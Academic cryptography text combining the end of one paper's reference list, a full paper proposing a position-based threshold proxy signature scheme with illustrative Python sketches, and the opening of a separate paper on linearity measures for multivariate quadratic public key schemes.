[21] NIST FIPS PUB 186-2, Digital Signature Standard (DSS). Available at: http://csrc.nist.gov/publications/fips/archive/fips186-2/fips186-2.pdf.
[22] NIST FIPS PUB 180-4, Secure Hash Standard (SHS), March 2012. Available at: http://csrc.nist.gov/publications/fips/fips180-4/fips-180-4.pdf.
[23] NIST FIPS PUB 186, Digital Signature Standard (DSS). Available at: http://csrc.nist.gov/publications/fips/archive/fips186-2/fips186-2.pdf.
[24] NIST FIPS PUB 197, Announcing the Advanced Encryption Standard (AES), Federal Information Processing Standards Publication 197, November 26, 2001.
[25] NIST FIPS PUB 198, The Keyed-Hash Message Authentication Code (HMAC). Available at: http://csrc.nist.gov/publications/fips/fips198/fips-198a.pdf.
[26] NIST Removes Cryptography Algorithm from Random Number Generator Recommendations. Available at: http://www.nist.gov/itl/csd/sp800-90-042114.cfm.
[27] NIST SP 800-38A, Recommendation for Block Cipher Modes of Operation, 2001. Available at: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf.
[28] NIST SP 800-38D, Recommendation for Block Cipher Modes of Operation: Galois/Counter Mode (GCM) and GMAC, 2007. Available at: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf.
[29] Paulo Barreto's AES Public Domain Implementation in Java. Available at: www.larc.usp.br/~pbarreto/JAES.zip.
[30] R. Barbulescu, P. Gaudry, A. Joux, and E. Thomé, "A quasi-polynomial algorithm for discrete logarithm in finite fields of small characteristic," June 2013, preprint. Available at: http://eprint.iacr.org/2013/400.pdf.
[31] SERPENT, A Candidate Block Cipher for the Advanced Encryption Standard. Available at: www.cl.cam.ac.uk/~rja14/serpent.html.
[32] SHA-3 proposal BLAKE. Available at: https://131002.net/blake.
[33] Spongy Castle: Repackage of Bouncy Castle for Android, Bouncy Castle Project, 2012. Available at: http://rtyley.github.com/spongycastle/.
[34] T. St. Denis and S. Johnson, Cryptography for Developers, Syngress, 2006.
[35] The Java HotSpot Performance Engine Architecture. Available at: www.oracle.com/technetwork/java/whitepaper-135217.html.
[36] The Legion of the Bouncy Castle, Legion of the Bouncy Castle Java cryptography APIs. Available at: www.bouncycastle.org/java.html.
[37] Tuning Garbage Collection with the 5.0 Java Virtual Machine. Available at: http://www.oracle.com/technetwork/java/gc-tuning-5-138395.html.
[38] W. Diffie and M. Hellman, "New Directions in Cryptography," IEEE Trans. on Inf. Theory, vol. 22, no. 6, Nov. 1976, pp. 644-654.
[39] W. Diffie, P. C. van Oorschot, and M. J. Wiener, "Authentication and Authenticated Key Exchanges," Designs, Codes and Cryptography (Kluwer Academic Publishers), vol. 2, no. 2, 1992, pp. 107-125.
Threshold Proxy Signature Based on Position
Qingshui Xue
Dept. of Computer Science and Engineering
Shanghai Jiao Tong University
Shanghai, China
xue-qsh@cs.sjtu.edu.cn

Fengying Li
School of Continuous Education
Shanghai Jiao Tong University
Shanghai, China
fyli@sjtu.edu.cn

Zhenfu Cao
Dept. of Computer Science and Engineering
Shanghai Jiao Tong University
Shanghai, China
zfcao@cs.sjtu.edu.cn
Abstract—Position-based cryptography has attracted much
attention from researchers. In the mobile Internet, there are many
position-based security applications. For the first time, a new
concept, threshold proxy signature based on position, is
proposed. Based on a secure positioning protocol, a model
of threshold proxy signature based on position is proposed. In
the model, positioning protocols are bound tightly, not loosely,
to the threshold proxy signature. Further, a position-based
threshold proxy signature scheme is designed, its correctness is
proved, and its security is analyzed. As far as we know, it is the
first threshold proxy signature scheme based on position.
Keywords-position; threshold proxy signature; proxy signature; UC security; model; scheme.
I. INTRODUCTION
In the setting of the mobile Internet, position services and
position-binding security applications have become a key
requirement, especially the latter. Position services include
position inquiry, secure positioning, and so forth. Position
inquiry consists of inquiring one's own position and
positioning other entities. Technologies for inquiring one's
own position include the Global Positioning System (GPS) and
other satellite service systems; technologies for positioning
other entities include radar and so on [2]-[6]. As is well known,
positioning other entities is the more challenging task.
Position-binding security applications, such as position-based
encryption and position-based signature and authentication,
are increasingly necessary. For example, when a
mobile user sends messages to a specific position, which is
either a physical address or a logical address (such as an
Internet Protocol address), it is desirable that only the user who
is at that address, or has been at that address, can receive and
decrypt the encrypted messages. Even if other mobile users at
that position receive the messages, they cannot decrypt them. If
the specified receiver temporarily leaves that position for some
reason, he/she will no longer be able to receive or decrypt
messages. In addition, if the specified receiver moves to another
place, he/she may hope to receive messages at the new place.
Take an application of position-based signature and
authentication as an example. A mobile or fixed user signs
messages at one place and sends them to another mobile user.
The receiver can receive the signed message and verify
whether the received message was indeed signed at that place
by the signer. Even if the signer moves to another address, this
will not affect the reception and verification of signed
messages.
Currently, the research on position-based cryptography
focuses on secure positioning, on which some work has
been proposed [1]. These positioning protocols are based on
one-, two-, or three-dimensional spaces,
including traditional wireless network settings [1], as well as
the quantum setting [7]-[9]. It seems to us that position-based
cryptography should integrate secure positioning with
cryptographic primitives. If we concentrate only, or too much,
on positioning protocols, we may remain far from
position-based cryptography. In other words, nowadays
positioning is bound loosely, not tightly, to related security
applications, which results in the slow progress of
position-based cryptography and its applications. Relying on
these thoughts, our main contributions in this paper are as follows.
(1) A model of threshold proxy signature based on positions is proposed. Position-based threshold proxy signature is a kind of threshold proxy signature, but a novel one. Its definition is given and its model is constructed. In the meantime, its security properties are defined.
(2) To realize this kind of threshold proxy signature, a threshold proxy signature scheme based on a secure positioning protocol is proposed and its security is analyzed as well.
The rest of the paper is organized as follows. In Section II, the function of positioning and one secure positioning protocol are introduced. In Section III, the model and definition of threshold proxy signature based on positions are constructed. A position-based threshold proxy signature scheme is designed in Section IV. The correctness of the scheme is proved in Section V. The security of the proposed scheme is analyzed in Section VI. Finally, the conclusion is given.
II. POSITION PROTOCOLS
In this section, the function of positioning protocols and one secure positioning protocol are introduced.
A. Function of Positioning Protocols
The goal of a positioning protocol is to check whether a position claimer is really at the position it claims. Generally speaking, a positioning protocol has at least two kinds of participants, position claimers and verifiers, where the verifiers may be regarded as position infrastructure. According to the purpose of positioning, there are two kinds of positioning protocols, i.e., protocols for positioning one's own position and protocols for positioning others' positions. As of now, much work has been done on own-position positioning protocols [2]-[6]. Nevertheless, research on others'-position positioning protocols is far scarcer, and many open questions remain. In our model and scheme, we make full use of both varieties of positioning protocol.
B. One Secure Positioning Protocol
Here, a secure positioning protocol for others' positions is introduced. Compared with own-position positioning protocols, others'-position positioning protocols are more complex.
In this section, N. Chandran et al.'s secure positioning protocol in three dimensions is reviewed [1]; it can be used in the mobile Internet.
The protocol uses 4 verifiers, denoted by V1, V2, ..., V4, which can output strings Xi. The prover claims his/her position, which is enclosed in the tetrahedron defined by the 4 verifiers. Let t1, ..., t4 be the times taken for radio waves to arrive at the point P from verifiers V1, V2, ..., V4, respectively. When we say that V1, V2, ..., V4 broadcast messages such that they "meet" at P, we mean that they broadcast the messages at times T − t1, T − t2, T − t3 and T − t4, respectively, so that at time T all the messages are at position P in space. The protocol uses a pseudorandom generator, namely an ε-secure PRG: {0,1}^n × {0,1}^m → {0,1}^m. The parameters are selected such that 2^(−m) is negligible in the security parameter. Xi denotes a string chosen randomly from a reverse block entropy source. The protocol is given as follows:
Step 1. V1, V2, V3 and V4 pick keys K1, K2, K3 and K4 selected randomly from {0,1}^m and share them through their private channel.
Step 2. To enable the device at P to calculate Ki for 1 ≤ i ≤ 4, the verifiers do as follows. V1 broadcasts the key K1 at time T − t1. V2 broadcasts X1 at time T − t2 and meanwhile broadcasts K2' = PRG(X1, K1) ⊕ K2. Similarly, at time T − t3, V3 broadcasts (X2, K3' = PRG(X2, K2) ⊕ K3), and V4 broadcasts (X3, K4' = PRG(X3, K3) ⊕ K4) at time T − t4.
Step 3. At time T, the prover at position P calculates K(i+1) = PRG(Xi, Ki) ⊕ K'(i+1) for 1 ≤ i ≤ 3. Then it sends K4 to all verifiers.
Step 4. All verifiers check that the string K4 is received at time T + ti and that it equals the K4 they pre-picked. If these verifications hold, the position claim of the prover is accepted and the prover is supposed to be indeed at position P. Otherwise, the position claim is invalid.
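The key chaining of Steps 1–3 can be simulated in a few lines. This is only a sketch: the ε-secure PRG is replaced by a hash-based stand-in, broadcast timing is not modelled, and all names are illustrative rather than part of [1].

```python
import hashlib
import os

M = 16  # key length in bytes; parameters chosen so 2^(-m) is negligible

def prg(x: bytes, k: bytes) -> bytes:
    # Hash-based stand-in for the epsilon-secure PRG: {0,1}^n x {0,1}^m -> {0,1}^m.
    return hashlib.sha256(x + k).digest()[:M]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(p ^ q for p, q in zip(a, b))

# Step 1: verifiers V1..V4 pick random keys K1..K4.
K = [os.urandom(M) for _ in range(4)]
# X1..X3: strings drawn from the entropy source.
X = [os.urandom(M) for _ in range(3)]

# Step 2: V_{i+1} broadcasts (X_i, K'_{i+1} = PRG(X_i, K_i) XOR K_{i+1}),
# timed so that all broadcasts "meet" at P at time T.
K_prime = [xor(prg(X[i], K[i]), K[i + 1]) for i in range(3)]

# Step 3: the prover at P receives K1 first and unrolls the chain to recover K4.
k_cur = K[0]
for i in range(3):
    k_cur = xor(prg(X[i], k_cur), K_prime[i])

# Step 4: the verifiers accept iff the returned value equals their K4
# (and arrives at the expected time T + t_i, which is not modelled here).
assert k_cur == K[3]
```

Only a device that is actually at P sees all four broadcasts simultaneously at time T, which is why the chained recovery of K4 serves as evidence of position.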
III. THE MODEL OF POSITION-BASED THRESHOLD PROXY SIGNATURE
The model, definition and security properties are proposed in this section.
A. The Model
In the model, there are four kinds of participants: the original signer (OS), the proxy signer group (PSG), which consists of n proxy signers {PS1, PS2, ..., PSn}, the verifier (V) and the position infrastructure (PI). OS confirms his/her own position and, at that position, delegates his/her signing power to the proxy signer group, whose members sign messages at their own positions on behalf of OS. t (t ≤ n) or more proxy signers can cooperate to sign a message at their individual positions, after their positions have been confirmed by PI and shown to match the ones in the proxy signing delegation warrant, whereas fewer than t proxy signers cannot. V checks that the proxy signature was generated by the actual proxy signers at their individual positions on behalf of OS. PI, a trusted third party, provides position services for the related parties. The model is illustrated in Figure 1.
Figure 1. Model of position-based threshold proxy signature.
B. Definition
Position-based threshold proxy signature.
Simply speaking, this kind of proxy signature combines proxy signature, threshold proxy signature and positioning protocols in one single scheme. It is mainly composed of three modules: threshold proxy signing power delegation, threshold proxy signing, and threshold proxy signature verifying. In the module of threshold proxy signing power delegation, OS first sends a request to PI in order to delegate signing power to PSG. Then PI runs a positioning protocol to confirm the positions of OS and the proxy signers. If their positions are valid, PI sends an acknowledgement to OS and the proxy signers. After that, PI produces proxy signing key packages for the individual proxy signers and sends them to each proxy signer. OS produces a proxy delegation warrant for all proxy signers. In the module of threshold proxy signing, each proxy signer who actually wants to take part in signing has to first check that his/her position is the designated position specified in the proxy delegation warrant. If it is, each actual proxy signer can use his/her proxy signing key package to sign the message only once, and sends the individual proxy signature to a clerk, who collects all individual signatures and generates the final threshold proxy signature. In the module of threshold proxy signature verifying, V uses the identities and positions of OS and all proxy signers to check the validity of position-based threshold proxy signatures.

Remark 1. In the module of threshold proxy signing power delegation, if OS and the proxy signers do not run positioning protocols with PI to confirm their own positions, OS is unable to delegate his/her signing power to the proxy signer group; that is, unless both OS and each proxy signer confirm their positions with PI, OS cannot fulfill his/her delegation of signing power. In the module of threshold proxy signing, if a proxy signer does not perform the positioning protocol to check the validity of his/her position, he/she is not able to generate an individual proxy signature with the individual proxy signing key package. That is to say, before the proxy signer group signs a message on behalf of OS, each member has to confirm its position. Even if a proxy signer passes the confirmation of his/her individual position, he/she can sign one message only once. In the module of threshold signature verifying, it is unnecessary for the verifier to confirm the positions of OS and the proxy signers.

As will be seen, we regard the modules as primitives. Therefore, in our model, the positioning protocol is bound tightly, not loosely, with the delegation of signing power and the generation of threshold proxy signatures. Thus, in the model, the position-based threshold proxy signature is composed of four primitives: Initialization, PropTProxyDelegate, PropTProxySign and PropTProxyVerify.

Initialization. PI takes as input the security parameter 1^k and outputs the system master key mk and public parameter pp; in the meantime, the system distributes the user identity IDi for each user i.

PropTProxyDelegate. When OS wants to delegate his/her signing power to the proxy signer group, OS first sends his/her request to PI. After PI gets OS's request, PI checks the validity of the positions PosOS, PosPS1, PosPS2, ..., PosPSn of OS and all proxy signers by running the positioning protocol with OS and each proxy signer. If the positions of OS and all proxy signers are valid, PI sends the acknowledgment to OS. According to the acknowledgment from PI, OS generates the delegation warrant dw and sends it to each proxy signer PSi (i = 1, 2, ..., n). At the same time, PI produces the proxy signing key package pskpi for PSi (i = 1, 2, ..., n). dw contains the identities and positions of OS and all proxy signers, n, the threshold value t, the message types to sign, the expiry date and so forth. pskpi encapsulates the positioning protocol, the proxy signing key, the i-th proxy signer's identity IDPSi and position PosPSi, the signing algorithm, etc.

PropTProxySign. When the proxy signer group wants to sign the message m on behalf of OS, each actual proxy signer PSi (i = 1, 2, ..., k; t ≤ k ≤ n; here, assume that PSi (i = 1, 2, ..., k) are the proxy signers participating in the signing, denoted by aps) first executes the individual proxy signing key package pskpi to run the positioning protocol to confirm the validity of his/her position PosPSi with PI. If his/her current position PosPSi is identical to the one in the delegation warrant dw, he/she is able to use the proxy signing key package pskpi to sign the message m only once, and sends the corresponding individual proxy signature (m, si, dw, pp) to the Clerk, who collects and verifies the individual signatures and generates the final threshold proxy signature. The Clerk checks the validity of each individual signature si by using the identity IDPSi and position PosPSi of PSi and the corresponding verification algorithm. If the number k of actual proxy signers satisfies t ≤ k ≤ n, and the k individual signatures are valid, the Clerk generates the final threshold proxy signature (m, s, dw, aps, pp) and sends it to V. Here, s is simply denoted by s = s1 + s2 + ... + sk.

PropTProxyVerify. After receiving the threshold proxy signature (m, s, dw, aps, pp) from the proxy signer group, V takes as input the identities IDOS, IDPS1, IDPS2, ..., IDPSn, the positions PosOS, PosPS1, PosPS2, ..., PosPSn, aps and pp to check whether or not s is the threshold proxy signature on the message m, by using the corresponding threshold proxy signature verification algorithm. If it holds, V can be sure that the message m was signed by the actual proxy signers PSi (i = 1, 2, ..., k) at positions PosPSi (i = 1, 2, ..., k) on behalf of OS, who delegated his/her signing power to the proxy signer group at the position PosOS.

Figure 2. Position-based threshold proxy signature.
The model is illustrated in Figure 2.
C. Security Properties of Position-Based Threshold Proxy Signature
Besides the security properties of threshold proxy signatures, this kind of threshold proxy signature has the following security properties.
(1) Positioning protocol binding. In the module of PropTProxyDelegate, without confirmation of the positions of OS and all proxy signers by running the positioning protocol with PI, OS is unable to fulfill his/her delegation of signing power. In addition, the proxy signing key package of each proxy signer produced by PI is tightly bound with the positioning protocol, which means that if the proxy signers want to use their proxy signing key packages, each of them has to run the positioning protocol with PI. In the module of PropTProxySign, if the proxy signer group needs to sign a message on behalf of OS, then in order to obtain the proxy signing key (implicitly), each proxy signer has to use the individual proxy signing key package to run the positioning protocol with PI. If a proxy signer is indeed at the position specified in the delegation warrant dw, he/she will be able to obtain (implicitly) the proxy signing key and sign one message only once. Actually, no proxy signer can get the real individual proxy signing key, which is encapsulated in the proxy signing key package.
Remark 2. In the model, each time the proxy signers want to cooperate to sign messages on behalf of OS, each of them has to run the positioning protocol with PI to confirm the validity of his/her individual position. One may think that we should use a one-time digital signing algorithm or one-time signing private keys. In fact, in the model, using one-time signing keys is optional. On the one hand, if the model uses a fixed signing private key encapsulated in the proxy signing key package, no proxy signer can use it at will, and each can sign one message only once. If the proxy signer group wants to sign another message, all of them still need to communicate with PI once again. In this sense, no proxy signer actually has knowledge of his/her own proxy signing private key. On the other hand, using one-time signing private keys in the model is also reasonable; that is, each time, each proxy signing key package releases a fresh random proxy signing key. In addition, because position-based applications are closely related to instant position authentication or confirmation, we think that position-based cryptography should be researched in depth with respect to online cryptography, which focuses on instant cryptographic algorithms and security processing. Of course, in our view, this is an open question as well.
IV. ONE POSITION-BASED THRESHOLD PROXY SIGNATURE SCHEME
In this section, a position-based threshold proxy signature scheme with one original signer and n proxy signers is proposed. The scheme mainly includes four kinds of participants: the original signer (still denoted OS), the proxy signer group PSG = {PS1, PS2, ..., PSn}, the verifier (V) and PI. PI makes use of the secure positioning protocol described in Section II-B to provide position services for the original signer and the n proxy signers. In addition, PI is regarded as the trusted third party and system authority. The scheme is composed of four primitives: Initialization, PropTProxyDelegate, PropTProxySign and PropTProxyVerify. Being primitives means that each of them either runs completely or does nothing. The four primitives are detailed as follows.
A. Initialization
PI takes as input the security parameter 1^k and outputs the system master key mk and public parameter pp; at the same time, PI distributes the user identity IDi for each user i. The primitive is written as Initialization(k, mk, pp).
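A minimal sketch of the Initialization primitive follows. All concrete choices are illustrative: the paper leaves the key generation algorithm and identity format abstract, so random byte strings and sequential identifiers stand in for them here.

```python
import secrets

def initialization(k: int):
    # PI derives the system master key mk and public parameter pp
    # from the security parameter 1^k (here: k random bytes each).
    mk = secrets.token_bytes(k)
    pp = secrets.token_bytes(k)
    return mk, pp

def distribute_identity(registry: dict, user: str) -> str:
    # PI assigns a fresh identity ID_i to user i (illustrative format).
    uid = "ID_" + str(len(registry) + 1)
    registry[user] = uid
    return uid

mk, pp = initialization(16)
registry = {}
distribute_identity(registry, "OS")     # -> "ID_1"
distribute_identity(registry, "PS1")    # -> "ID_2"
```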
B. PropTProxyDelegate
Step 1. The original signer sends his/her request (IDOS, PosOS, IDPS1, PosPS1, IDPS2, PosPS2, ..., IDPSn, PosPSn, reqdeleg) of delegating signing power to the proxy signer group to PI.
Step 2. After PI gets OS's request, PI checks the validity of the positions PosOS, PosPS1, PosPS2, ..., PosPSn of OS and all proxy signers by running the positioning protocol with OS and each proxy signer.
Step 3. If the positions PosOS, PosPS1, PosPS2, ..., PosPSn of OS and all proxy signers are valid, which means that OS is indeed at the position PosOS and PosPSi is a valid position of PSi (i = 1, 2, ..., n), PI sends the acknowledgement (IDOS, PosOS, IDPS1, PosPS1, IDPS2, PosPS2, ..., IDPSn, PosPSn, ackdeleg) to OS; otherwise PI sends (IDOS, PosOS, IDPS1, PosPS1, IDPS2, PosPS2, ..., IDPSn, PosPSn, rejdeleg) to OS.
Step 4. If OS receives (IDOS, PosOS, IDPS1, PosPS1, IDPS2, PosPS2, ..., IDPSn, PosPSn, ackdeleg) from PI, he/she generates the delegation warrant dw = (IDOS, PosOS, IDPS1, PosPS1, IDPS2, PosPS2, ..., IDPSn, PosPSn, SignOS(IDOS, PosOS, IDPS1, PosPS1, IDPS2, PosPS2, ..., IDPSn, PosPSn)), where SignOS(IDOS, PosOS, IDPS1, PosPS1, IDPS2, PosPS2, ..., IDPSn, PosPSn) is the digital signature on (IDOS, PosOS, IDPS1, PosPS1, IDPS2, PosPS2, ..., IDPSn, PosPSn) generated by OS, and sends it to each proxy signer.
Step 5. PI produces the proxy signing key package pskpi for each proxy signer and sends it to PSi (i = 1, 2, ..., n). pskpi encapsulates the positioning protocol, the proxy signing key, the signing algorithm, the identity and position of PSi, etc. Anyone wanting to use the proxy signing key and signing algorithm in pskpi has to run the proxy signing key package pskpi.
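The warrant construction of Step 4 can be sketched as follows. This is hypothetical: the paper leaves SignOS abstract, so an HMAC stands in for the original signer's signature algorithm, and the field names are illustrative.

```python
import hashlib
import hmac

def sign_os(os_key: bytes, payload: bytes) -> bytes:
    # Placeholder for Sign_OS: an HMAC stands in for the (unspecified)
    # digital signature algorithm of the original signer.
    return hmac.new(os_key, payload, hashlib.sha256).digest()

def make_warrant(os_key, id_os, pos_os, proxy_ids, proxy_positions):
    # dw = (ID_OS, Pos_OS, ID_PS1, Pos_PS1, ..., ID_PSn, Pos_PSn, Sign_OS(...))
    fields = [id_os, pos_os]
    for pid, ppos in zip(proxy_ids, proxy_positions):
        fields += [pid, ppos]
    payload = "|".join(fields).encode()
    return {"fields": fields, "sig": sign_os(os_key, payload)}

def check_warrant(os_key, dw):
    # Recompute the signature over the warrant fields and compare.
    payload = "|".join(dw["fields"]).encode()
    return hmac.compare_digest(dw["sig"], sign_os(os_key, payload))

dw = make_warrant(b"os-secret", "ID_OS", "(1,2,3)",
                  ["ID_PS1", "ID_PS2"], ["(4,5,6)", "(7,8,9)"])
assert check_warrant(b"os-secret", dw)
```

With a real public-key signature in place of the HMAC, each proxy signer could verify dw without sharing a secret with OS.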
C. PropTProxySign
Step 1. When the proxy signer group wants to sign the message m on behalf of OS, each actual proxy signer PSi (i = 1, 2, ..., k; t ≤ k ≤ n; here, assume that PSi (i = 1, 2, ..., k) are the actual proxy signers, denoted by aps) runs the proxy signing key package pskpi to execute the positioning protocol to confirm the validity of his/her position PosPSi with PI.
Step 2. If PSi's current position PosPSi is identical to the one in the delegation warrant dw, the proxy signing key package pskpi prompts PSi to input the message m to pskpi. Then pskpi produces the individual proxy signature si and sends it to the Clerk. If PSi's current position PosPSi is not identical to the one in the delegation warrant dw, PSi is unable to perform the proxy signing function and stops (i = 1, 2, ..., k).
Step 3. After the Clerk receives the individual proxy signature si, he/she checks that si is a valid individual proxy signature by using the verification algorithm and the identity and position of PSi (i = 1, 2, ..., k).
Step 4. If all si pass verification, the Clerk generates the final threshold proxy signature s by processing all individual proxy signatures si (i = 1, 2, ..., k). Here, s is simply denoted by s = s1 + s2 + ... + sk.
Step 5. The Clerk sends (m, s, dw, aps, pp) to the proxy signature verifier V.
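The Clerk's part (Steps 3–5) can be sketched as a toy model: individual signatures are modelled as integers, their combination as the sum s = s1 + ... + sk, and the verification algorithm as a caller-supplied predicate. None of these stand-ins is prescribed by the scheme itself.

```python
def clerk_combine(individual_sigs, t, n, verify):
    # Step 3: check each individual proxy signature (pid = signer identity).
    valid = [(pid, s) for pid, s in individual_sigs if verify(pid, s)]
    k = len(valid)
    # Step 4: the threshold condition t <= k <= n must hold.
    if not (t <= k <= n):
        return None
    # s = s_1 + s_2 + ... + s_k
    return sum(s for _, s in valid)

sigs = [("PS1", 11), ("PS2", 22), ("PS3", 33)]
verify = lambda pid, s: True  # stand-in for the real verification algorithm

clerk_combine(sigs, t=2, n=5, verify=verify)      # -> 66 (threshold met)
clerk_combine(sigs[:1], t=2, n=5, verify=verify)  # -> None (fewer than t signers)
```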
D. PropTProxyVerify
Step 1. After receiving the threshold proxy signature (m, s, dw, aps, pp), V takes as input the identities IDOS, IDPS1, IDPS2, ..., IDPSn and the positions PosOS, PosPS1, PosPS2, ..., PosPSn from dw and pp to check that the proxy delegation warrant dw is valid. If it is valid, the scheme continues; otherwise V stops with failure.
Step 2. V takes as input the identities IDOS, IDPS1, IDPS2, ..., IDPSn and the positions PosOS, PosPS1, PosPS2, ..., PosPSn from dw, together with aps and pp, to check whether or not s is the threshold proxy signature on the message m, with t ≤ k ≤ n. If it holds, V can be sure that the message m was signed by the actual proxy signers at their individual positions PosPSi (i = 1, 2, ..., k) on behalf of OS, who delegated his/her signing power to all proxy signers PSi (i = 1, 2, ..., n) at the position PosOS.

V. CORRECTNESS OF THE ABOVE SCHEME
In fact, the proof of correctness of the above scheme is simple. The following theorem is given.
Theorem 1: If the scheme runs accurately and sequentially according to the primitives above, the verifier V can confirm that the threshold proxy signature is generated by the actual proxy signers aps at their individual positions PosPSi (i = 1, 2, ..., k) on behalf of the original signer OS, who at the position PosOS delegated his/her signing power to the group of proxy signers.
Proof.
In the primitive of PropTProxyDelegate, PI checks the validity of the positions PosOS, PosPS1, PosPS2, ..., PosPSn of OS and all proxy signers by running the positioning protocol with OS and each proxy signer. If all positions are valid, which means that OS is actually at the position PosOS and PosPSi is a valid position of PSi (i = 1, 2, ..., n), PI sends the acknowledgement (IDOS, PosOS, IDPS1, PosPS1, IDPS2, PosPS2, ..., IDPSn, PosPSn, ackdeleg) to OS. Then OS generates the delegation warrant dw = (IDOS, PosOS, IDPS1, PosPS1, IDPS2, PosPS2, ..., IDPSn, PosPSn, SignOS(IDOS, PosOS, IDPS1, PosPS1, IDPS2, PosPS2, ..., IDPSn, PosPSn)) and sends it to each proxy signer. At the same time, PI produces the proxy signing key package pskpi for each proxy signer and sends it to PSi (i = 1, 2, ..., n). In the primitive of PropTProxySign, when the proxy signer group wants to sign the message m on behalf of OS, each actual proxy signer PSi (i = 1, 2, ..., k) runs the proxy signing key package pskpi to execute the positioning protocol to confirm the validity of his/her position PosPSi with PI. If PSi's current position PosPSi is identical to the one in the delegation warrant dw, the proxy signing key package pskpi prompts PSi to input the message m to pskpi. Then pskpi produces the individual proxy signature si and sends it to the Clerk. After the Clerk receives the individual proxy signatures si, he/she checks that each si is a valid individual proxy signature by using the verification algorithm and the identities and positions of PSi (i = 1, 2, ..., k). If all si pass verification, the Clerk generates the final threshold proxy signature s by processing all individual proxy signatures si (i = 1, 2, ..., k). Finally, the Clerk sends (m, s, dw, aps, pp) to the proxy signature verifier V. In the primitive of PropTProxyVerify, V takes as input the identities IDOS, IDPS1, IDPS2, ..., IDPSn and the positions PosOS, PosPS1, PosPS2, ..., PosPSn from dw and pp to check that the proxy delegation warrant dw is valid. Next, V takes as input the identities IDOS, IDPS1, IDPS2, ..., IDPSn and the positions PosOS, PosPS1, PosPS2, ..., PosPSn from dw, together with aps and pp, to check whether or not s is the threshold proxy signature on the message m. If it holds, V can be sure that the message m was signed by the actual proxy signers at their individual positions PosPSi (i = 1, 2, ..., k) on behalf of OS, who delegated his/her signing power to all proxy signers at the position PosOS. Thus, it is proved.
VI. SECURITY ANALYSIS OF THE PROPOSED SCHEME
In the proposed scheme, three sorts of technology are used: secure positioning protocols (including others'-position positioning and own-position positioning), proxy signature and threshold proxy signature. That means the security of the proposed scheme depends on the security of the three kinds of technology used. Because the proposed scheme, or the model, is a component framework, it is appropriate to analyze its security in the Universal Composability (UC) framework [10]. That is, by constructing components for the proxy signature model, the digital signature model and the positioning protocol model, and by modelling attacks by internal attackers, external attackers and conspiracy attackers, the security of the above scheme can be analyzed. The internal attackers are the original signer and the proxy signers; the external attackers can be any software systems or entities; the conspiracy attackers are mainly among the proxy signers, and partially between the original signer and some malicious proxy signers. By adding these models to the ideal environment of the UC framework, if the scheme can be proved secure in the ideal environment, its security in the real environment follows as well. A deeper security analysis will be carried out in future work.

VII. CONCLUSION AND FUTURE WORK
In this paper, according to the security requirements of the mobile Internet, a model of position-based threshold proxy signature is constructed. Its definition, security properties and construction are given. As far as we know, it is the first model combining positioning protocols, proxy signature and threshold proxy signature. In the meantime, a position-based threshold proxy signature scheme is proposed and its security is analyzed. We will further improve the relevant models and schemes. We believe that research on positioning-protocol-based cryptographic models and schemes will become a focus in the setting of the mobile Internet.

ACKNOWLEDGMENT
I would like to thank the anonymous reviewers for their advice on modifications and improvements. In addition, this paper is supported by NSFC under Grant No. 61170227, the Ministry of Education Fund under Grant No. 14YJA880033, and Shanghai Projects under Grants No. 2013BTQ001, XZ201301 and 2013001.
REFERENCES
[1] N. Chandran, V. Goyal, R. Moriarty, and R. Ostrovsky, "Position Based Cryptography," CRYPTO 2009, Aug. 2009, pp. 391-407, doi: 10.1007/978-3-642-03356-8_23.
[2] S. M. Bilal, C. J. Bernardos, and C. Guerrero, "Position-based routing in vehicular networks: A survey," Journal of Network and Computer Applications, vol. 36, Feb. 2013, pp. 685-697, doi: 10.1016/j.jnca.2012.12.023.
[3] D. Singelee and B. Preneel, "Location verification using secure distance bounding protocols," IEEE Conference on Mobile Adhoc and Sensor Systems, Nov. 2005, doi: 10.1109/MAHSS.2005.1542879.
[4] A. Fonseca and T. Vazão, "Applicability of position-based routing for VANET in highways and urban environment," Journal of Network and Computer Applications, vol. 36, Mar. 2013, pp. 961-973, doi: 10.1016/j.jnca.2012.03.009.
[5] S. Capkun and J. P. Hubaux, "Secure positioning of wireless devices with application to sensor networks," IEEE INFOCOM, Mar. 2005, pp. 1917-1928, doi: 10.1109/INFCOM.2005.1498470.
[6] S. Capkun, M. Cagalj, and M. Srivastava, "Secure localization with hidden and mobile base stations," IEEE INFOCOM, Apr. 2006, doi: 10.1109/INFOCOM.2006.302.
[7] H. Buhrman et al., "Position-Based Quantum Cryptography: Impossibility and Constructions," CRYPTO 2011, Aug. 2011, pp. 429-446, doi: 10.1007/978-3-642-22792-9_24.
[8] H. Buhrman et al., "Position-Based Quantum Cryptography: Impossibility and Constructions," SIAM J. Comput., vol. 43, Jan. 2014, pp. 150-178, doi: 10.1137/130913687.
[9] T. Y. Wang and Z. L. Wei, "One-time proxy signature based on quantum cryptography," Quantum Information Processing, vol. 11, Feb. 2012, pp. 455-463, doi: 10.1007/s11128-011-0258-6.
[10] R. Canetti, "Universally composable security: a new paradigm for cryptographic protocols," Proceedings of the 42nd IEEE Symposium on Foundations of Computer Science, Oct. 2001, pp. 136-145, doi: 10.1109/SFCS.2001.959888.
Linearity Measures for Multivariate Public Key Cryptography
Simona Samardjiska
Department of Telematics, NTNU, Trondheim, Norway
FCSE, “Ss Cyril and Methodius” University, Skopje, Republic of Macedonia
simonas@item.ntnu.no

Danilo Gligoroski
Department of Telematics, NTNU, Trondheim, Norway
danilog@item.ntnu.no
Abstract—We propose a new general framework for the security
of Multivariate Quadratic (MQ) public key schemes with respect
to attacks that exploit the existence of linear subspaces. We adopt
linearity measures that have been used traditionally to estimate
the security of symmetric cryptographic primitives, namely,
the nonlinearity measure for vectorial functions introduced by
Nyberg, and the (s, t)–linearity measure introduced recently
by Boura and Canteaut. We redefine some properties of MQ
cryptosystems in terms of these known symmetric cryptography
notions, and show that our new framework is a compact generalization of several known attacks in MQ cryptography against
single field schemes. We use the framework to explain various
pitfalls regarding the success of these attacks. Finally, we
argue that linearity can be used as a solid measure for the
susceptibility of MQ schemes to these attacks, and also as a
necessary tool for prudent design practice in MQ cryptography.
Keywords–Strong (s, t)–linearity; (s, t)–linearity; MinRank; good
keys; separation keys.
I. INTRODUCTION
In the past two decades, as a result of advances in quantum algorithms, the crypto community has shown increasing interest in algorithms that would be potentially secure in the post-quantum world. One of the possible alternatives is Multivariate Quadratic (MQ) public key cryptosystems, based on the NP-hard problem of solving systems of quadratic polynomial equations over finite fields.
